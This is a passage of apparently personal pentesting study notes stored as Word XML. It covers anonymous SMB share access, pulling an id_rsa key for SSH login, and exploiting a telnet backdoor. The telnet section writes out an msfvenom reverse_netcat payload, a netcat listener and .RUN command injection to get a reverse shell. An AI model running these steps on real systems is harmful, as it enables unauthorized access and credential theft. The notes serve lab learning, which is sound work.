    </w:p>
    <w:p w14:paraId="2C0ED3C1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDE4BAF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>From enumeration – gained – SMB share location + name of potential SMB share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0A57BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMBClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD49500" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Part of samba suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64E257" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: smbclient //[IP]/[SHARE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BE611" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Tags: -U [name] (specify the user); -p [port] (specify the port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5F870" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Smbclient //10.10.10.2/secret -U suit -p 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8A77F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Username: Anonymous, no password needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699E7F90" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. //10.10.54.11/profiles -U Anonymous -p 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00909BA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When password is request, press ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFC4BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If “smb: \&gt;”, success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B3830" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use “ls” for list, items with “D” are directories and can be accessed via “cd”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F477137" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Once interesting files are found, use get “[file of interest]” &lt;output file name&gt; to transfer to attacker system and read via “cat” command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF1469" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“id_rsa” is the default name of an SSH identity file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EDA49" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Retrieve with “get id_rsa &lt;output file name&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518E9B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check public key for potential usernames anchored to end of file and use for ssh login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA674B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Private key file, once permissions have been changed to 600 via chmod, can be used for ssh login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE99E69" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Ssh -I &lt;private key filename&gt; &lt;username&gt;@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EE6C7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9848D2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Application protocol which allows, via telnet client, connection, and execution of commands on a remote machine hosting a telnet server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E62AE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client becomes virtual terminal allowing you to interact with the remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C5E24" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sends messages in cleartext and has been replaced by SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B045601" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Accessed via “telnet” command and then use telnet-specific commands in the Telnet prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506456C7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: telnet [ip][port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461F825" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Ex. telnet 10.10.10.3 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7973D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DD520" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Methodology must be thorough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5F42E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Begin with port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26357476" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC18DFC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>No encryption and has typically poor access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70E272" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC30D1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Poorly hidden telnet services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD99013" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Service markings – example indicates “backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5179140D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Identifying information – example indicates username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0306D3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use information to access telnet port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682986CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Connecting to Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C251827" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>telnet [ip][port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561C540D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse Shell Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D1664B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shell is a piece of code or program which can be used to gain code or command execution on a device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E107B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse shells have target machine communicate back to the attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB123A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attacking machine has a listening port that receives communication, allowing code/command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37572937" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Once access has been granted using telnet [ip] [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4FD45" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use tcpdump listener on local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7705152F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Syntax: sudo tcpdump ip proto </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\icmp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> -i tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A931A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uses ICMP traffic listener using specific OpenVPN connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA1CFE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>On client side, use “.RUN ping &lt;attacker ip&gt; -c 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7203B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allows single ping to attacker to confirm inputs can be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C36C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>In new terminal, create reverse shell using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED29E3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Msfvenom -p cmd/unix/reverse_netcat lhost&lt;local ip&gt; lport=4444 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C9D8B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Create listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE49A31" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC1939" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Copy and paste msfvenom output (denoted by mkfifo) into telnet session, preceded by .RUN and execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01606039" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run session as normal navigation in linux terminal</w:t>
      </w:r>
    </w:p>
